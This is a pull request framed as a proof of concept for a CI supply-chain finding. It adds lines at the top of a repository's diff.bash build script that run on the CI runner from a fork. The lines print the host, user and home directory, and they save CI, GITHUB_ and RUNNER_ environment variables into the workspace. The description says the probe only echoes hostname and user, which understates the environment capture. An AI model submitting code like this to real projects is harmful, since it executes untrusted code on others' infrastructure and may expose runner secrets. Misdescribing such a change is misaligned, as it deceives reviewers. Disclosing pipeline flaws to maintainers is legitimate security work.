### PR TITLE
CI probe PoC: log runner identity at diff.bash start (distroless-20260811-01)

### DIFF
--- a/private/tools/diff/diff.bash
+++ b/private/tools/diff/diff.bash
@@ -1,6 +1,13 @@
 #!/usr/bin/env bash
 set -o pipefail -o errexit -o nounset
 
+# PoC probe: demonstrate fork-controlled code executes on the CI runner.
+echo "POC_EXEC_HOST=$(hostname)"
+echo "POC_EXEC_USER=$(id -un)"
+echo "POC_EXEC_HOME=$HOME"
+env | grep -E '^(CI|GITHUB_|RUNNER_)' | head -n 20 > /tmp/poc_env_probe.txt || true
+cp /tmp/poc_env_probe.txt ./poc_env_probe.txt 2>/dev/null || true
+
 # ./private/tools/diff/diff.bash --head-ref test --base-ref test --query-bazel --registry-spawn --report ./report.log
 
 STDERR=$(mktemp)


### PR DESCRIPTION
Benign PoC for the distroless-20260811-01 supply-chain finding: adds a probe at the top of private/tools/diff/diff.bash that echoes the runner hostname/user. No other changes. Demonstrates fork-controlled code executes on the CI runner via image-check.yaml.